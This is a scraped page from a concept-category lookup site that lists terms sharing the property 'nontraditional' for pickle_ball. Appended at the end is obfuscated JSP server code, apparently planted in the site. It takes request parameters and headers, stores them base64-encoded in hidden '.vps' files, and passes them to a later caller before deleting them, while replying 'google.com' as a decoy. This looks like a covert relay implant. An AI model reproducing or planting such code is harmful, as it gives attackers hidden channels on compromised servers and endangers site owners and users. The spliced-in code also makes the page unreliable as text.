Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
pickle_ball
with nuance
nontraditional
:
nontraditional:event,
Simple categories matching
nontraditional
:
hours,
training,
fiber,
phenomenon,
material,
branch,
home,
source,
security,
pizza,
item,
export,
location,
worker,
food,
metal,
field,
area,
place,
family,
relationship,
event,
flower,
meal,
sport,
component,
medium,
measure,
product,
lender,
application,
surface,
discipline,
game,
times,
user,
investment,
housing,
activity,
instrument,
sector,
Members with property
nontraditional
:
weekend,
aluminum_nitride,
evening,
sponge,
hospital,
rosewood,
nighttime_hours,
night,
mattress,
hockey,
economics,
string,
child_custody,
aerobic_studio,
wallpaper,
hotel,
holiday,
freezer,
late_evening,
leaf,
handball,
glass,
emission_trading,
footwear,
hemp,
fish_skin,
paper,
wood,
seed,
fabric,
wine,
civil_society,
clothing,
luggage,
college,
lesbian_couple,
mixed_medium,
porous_silicon,
textile,
religion,
drive,
mathematics,
biological_material,
checkers,
shell,
earth,
hotel_lobby,
raffia,
rifle,
radio,
graphite,
wednesday,
foam,
data_engineering,
college_campus,
pickle_ball,
fruit,
dentistry,
sailing,
bucket,
citric_fruit,
polymer_clay,
bowling,
skating,
shopping,
downhill_skiing,
pharmaceutical_product,
arena,
linen,
lunch_hour,
iron_gates,
veterinary_medicine,
online_lender,
homeless_shelter,
friday_night,
home_center,
laundromat,
sport_event,
clay,
satisfaction,
winter_fruit,
extramarital_affairs,
organic_polymer,
wax,
student,
frisbee_golf,
street_hockey,
history,
bamboo,
scrap_wood,
fossilised_ivory,
wall_covering,
transportation,
sandwich,
third_shift,
gothic_door,
wrestling,
homosexual_couple,
homosexual_relationship,
saliva,
tennis,
feather,
fern,
beryllium,
silicon,
floor_hockey,
french_door,
second,
structural_textile,
beach,
garment,
business,
video,
industry,
photograph,
fish_product,
fund,
latex,
special_diet,
electronic_material,
taco,
tuesday,
lacrosse,
education,
citrus_skin,
industrial_felt,
poor_education,
platinum,
screen_wire,
barber_shop,
flower,
skateboarding,
talk_radio,
beauty,
aluminum_foam,
saturday,
surfing,
powdered_metal,
metal,
henna_paste,
cardboard_tubing,
box_lunch,
furniture_set,
school-bus_driver,
lacquer,
manufactured_goods,
human_hair,
learner_motivation,
school,
selling,
water,
home_office,
organic_chemical,
soup,
nylon,
vase,
engineering_product,
travel_plaza,
volleyball,
tool,
fresh_fruit,
cloth,
airport,
ride,
thursday,
semiconductor,
parking_garage,
glycol,
international_rock,
north,
rugby,
carnation,
cosmetic,
fountain,
specialty_meat,
alumina,
cement,
bone,
apparel,
diamond,
marble,
university,
dance,
leaf_blower,
relaxation_technique,
soccer,
monday,
resort,
developing_country,
supermarket,
skiing,
horticultural_commodity,
drag_racing,
liquid_iron,
physics,
edible_substance,
paper_tray,
fiber,
campus,
beach_volleyball,
late_afternoon,
bronze,
horticultural_product,
energy,
paint,
silver_sheet,
major_appliance,
casino,
fried_corn,
civil_engineering,
temporary_shelter,
religious_facility,
scissors_championship,
giant_sponge,
saline_water,
military_school,
excess_inertia,
energy_service,
granite,
newspaper,
goatskin,
trouble,
iron,
bicycle,
steel,
titanium,
math,
jewelry,
polymer,
carbon_fiber,
retail_center,
bill_state,
unmarried_couple,
deep_water,
drum,
kiosk,
felt,
mobile_trailer,
herbal_remedy,
tar,
staple,
environmental_service,
water_security,
aluminum,
kitchen,
tungsten,
seafood_product,
chandelier,
swimming,
tropical_fruit,
magnesium,
pizza,
leather_goods,
rubber,
shelter,
aquaculture_product,
uniform,
chocolate,
engineering,
mantle,
molten_lead,
lucite,
library,
early_morning,
ink,
neon,
convenience_branch,
chemical_product,
mall,
church,
adventure,
river_stone,
lesbian_family,
wristwatch,
stadium,
museum,
cinema,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>